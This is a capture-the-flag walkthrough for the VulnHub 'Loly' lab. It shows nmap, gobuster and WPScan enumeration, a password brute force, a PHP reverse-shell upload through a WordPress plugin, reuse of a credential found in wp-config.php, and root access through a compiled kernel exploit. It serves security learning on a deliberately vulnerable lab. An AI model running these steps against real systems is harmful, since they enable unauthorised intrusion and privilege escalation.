Initial Enumeration

I started with Nmap to look for open ports and default scripts.

┌──(madhav㉿kali)-[~/Documents/vulnhub/loly]
└─$ nmap -sC -sV -oN nmap/initial 192.168.1.2 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-22 14:17 IST
Nmap scan report for 192.168.1.2
Host is up (0.0036s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.10.3 (Ubuntu)
|_http-server-header: nginx/1.10.3 (Ubuntu)
|_http-title: Welcome to nginx!
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.14 seconds

We can that only port 80 is open to let's open up our browser and enumerate port 80.

We can see the default nginx page, Next I performed a gobuster scan to look for hidden directories.

┌──(madhav㉿kali)-[~/Documents/vulnhub/loly]
└─$ gobuster dir -u http://192.168.1.2 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .txt,.php,.html
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.2
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,php,html
[+] Timeout:        10s
===============================================================
2020/09/22 14:20:16 Starting gobuster
===============================================================
/wordpress (Status: 301)
===============================================================
2020/09/22 14:22:54 Finished
===============================================================

We can see a /wordpress directory, when we try to open it in the web browser, it gives us a hostname loly.lc. I added it in my /etc/hosts file.

┌──(madhav㉿kali)-[~]
└─$ cat /etc/hosts              
127.0.0.1       localhost
127.0.1.1       kali
192.168.1.2     loly.lc

Next I used wpscan to enumerate users and look for vulnerable plugins.

┌──(madhav㉿kali)-[~/Documents/vulnhub/loly]
└─$ wpscan --url http://loly.lc/wordpress --enumerate u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://loly.lc/wordpress/ [192.168.1.2]
[+] Started: Tue Sep 22 15:41:49 2020

 ...

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=================================================================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] loly
 | Found By: Author Posts - Display Name (Passive Detection)
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

 ...

We have a user named loly. So I used the wpscan again to brute force the password for user loly with rockyou.txt.

┌──(madhav㉿kali)-[~/Documents/vulnhub/loly]
└─$ wpscan --url http://loly.lc/wordpress --usernames loly --passwords /usr/share/wordlists/rockyou.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://loly.lc/wordpress/ [192.168.1.2]
[+] Started: Tue Sep 22 15:43:43 2020


...

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - loly / fernando

[!] Valid Combinations Found:
 | Username: loly, Password: fernando

...

Hurray,  we found a valid combination. I logged into the wordpress panel using username loly and password fernando.

Initial Foothold

The next is to get a shell on the box. For this, I saw that we have a plugin named "AdRotate" installed where we can upload a zip file.

http://loly.lc/wordpress/wp-admin/admin.php?page=adrotate-media

I used the php-reverse-shell from pentest monkey. I compressed it into a zip file and then uploaded it on the machine. After uploading it, I executed it using the following command:

┌──(madhav㉿kali)-[~/Documents/vulnhub/loly]
└─$ curl -v http://loly.lc/wordpress/wp-content/banners/rev.php

Once I got the reverse shell, I started enumerating and found a database password in the wp-config.php file.

I used this password to login as user loly.

Root Shell

The root part is quite easy. If we check the OS info, we can see that it is using some older kernel version which is vulnerable to many exploits.

loly@ubuntu:~$ uname -a
Linux ubuntu 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

You can exploit this using many exploits available on the internet. I decided to go with this exploit. Just compile the exploit and execute it after giving the correct permissions.

loly@ubuntu:~$ gcc 45010.c -o exploit
loly@ubuntu:~$ chmod +x exploit && ./exploit

Hurray! we are root, now can read out flag present in the root directory.

root@ubuntu:~# cat /root/root.txt 
  ____               ____ ____  ____  
 / ___| _   _ _ __  / ___/ ___||  _ \ 
 \___ \| | | | '_ \| |   \___ \| |_) |
  ___) | |_| | | | | |___ ___) |  _ < 
 |____/ \__,_|_| |_|\____|____/|_| \_\
                                      
Congratulations. I'm BigCityBoy

That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!

NOTE: The awesome artwork used in this article was created by Joshua Sun.